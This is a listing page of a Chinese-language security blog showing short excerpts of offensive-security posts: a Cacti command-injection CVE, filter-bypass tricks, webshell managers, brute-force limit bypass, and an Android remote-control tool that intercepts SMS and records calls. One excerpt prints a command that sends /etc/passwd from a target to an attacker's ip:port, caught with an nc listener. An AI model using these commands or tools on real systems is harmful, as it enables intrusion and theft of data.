最新发布第34页
CVE-2024-29895 | Cacti服务器命令执行-XSS博客

CVE-2024-29895 | Cacti服务器命令执行

影响描述 CVE-2024-29895为命令注入漏洞,攻击者可在Cacti服务器的PHP元件启用register_argc_argv功能的情况下,对服务器下达任意命令,过程中无须通过身份验证,CVSS风险评为10分。 poc&ex...
xss-admin的头像-XSS博客xss-admin1年前
03416
【技术分享】命令执行和绕过的一些小技巧-XSS博客

【技术分享】命令执行和绕过的一些小技巧

先看一个例子 本地测试环境:PHP 5.4.45 + Win <?php     $command = 'dir '.$_POST['dir'];     $escaped_command = escapeshellcmd($command);     var_dump($escap...
xss-admin的头像-XSS博客xss-admin11个月前
01086
奇淫技巧:linux下无回显可将回显发送到服务器-XSS博客

奇淫技巧:linux下无回显可将回显发送到服务器

靶机无回显的情况下,可使用 cancel  来把回显发送到攻击机端 cancel -u '$(cat /etc/passwd)' -h ip:port 攻击机用nc来接收返回信息 nc -lvvp [port] 实例演示: 攻击机ip:192...
xss-admin的头像-XSS博客xss-admin11个月前
01296
利用openAI官方提供的WEB免费GPT-3.5-Turbo 实现API 服务-XSS博客

利用openAI官方提供的WEB免费GPT-3.5-Turbo 实现API 服务

前情提要 众所周知,openai官方开放了web端的GPT-3.5-Turbo模型,无需登陆,无需付费即可无限使用。但很多群友不想时刻挂梯子访问官方web,同时又有一些插件或者项目需要直接调用api来使用(比...
xss-admin的头像-XSS博客xss-admin11个月前
01676
靶场学习 - 从 joomla 到拿下域控-XSS博客

靶场学习 – 从 joomla 到拿下域控

访问网站主页,是一个博客网站 常规的目录扫描 这里发现一个疑似后台地址,访问 http://192.168.2.252/administrator/ 为 joomla 站点,印象中记得有 rce 的漏洞,上网寻找相关脚本进行利...
xss-admin的头像-XSS博客xss-admin11个月前
01566
移动安全 - 安卓 frida hook 基础篇-XSS博客

移动安全 – 安卓 frida hook 基础篇

frida hook 环境搭建 安装模块 安装 frida 模块和 frida-tools 模块 python -m pip install frida python -m pip install frida-tools 安装 adb https://developer.android.com/studio/releases...
xss-admin的头像-XSS博客xss-admin11个月前
01386
webshell管理工具-XSS博客

webshell管理工具

1 Cknife 一款 webshell 连接工具,项目地址:https://github.com/Chora10/Cknife 工具启动: /usr/lib/jvm/jdk1.8.0_281/bin/java -jar Cknife.jar & 工具的使用: 常见的一句话后门样例:...
xss-admin的头像-XSS博客xss-admin11个月前
01696
buro暴力破解保护失效绕过IP 封锁之登录次数限制-XSS博客

buro暴力破解保护失效绕过IP 封锁之登录次数限制

buro暴力破解保护失效绕过IP 封锁之登录次数限制
xss-admin的头像-XSS博客xss-admin10个月前
01166
python 端口在线扫描-XSS博客

python 端口在线扫描

引言 在渗透过程中,经常会遇到 nmap 扫描不出端口的情况,web 端口确定开放,且用网上的在线端口扫描是可以扫描到的,但是 nmap 就是无法扫出来,因此花了些时间写了 2 个基于 python 端口扫描...
xss-admin的头像-XSS博客xss-admin11个月前
01396
moukthar Android远程管理工具(安卓网页控)-XSS博客

moukthar Android远程管理工具(安卓网页控)

介绍:moukthar Android远程管理工具(安卓网页控),需自己搭建网页端,网页端就是你的控制台!下面是搭建教程。建议使用纯净linux系统! 功能 通知监听器 短信监听 电话录音 图像捕获和屏幕截...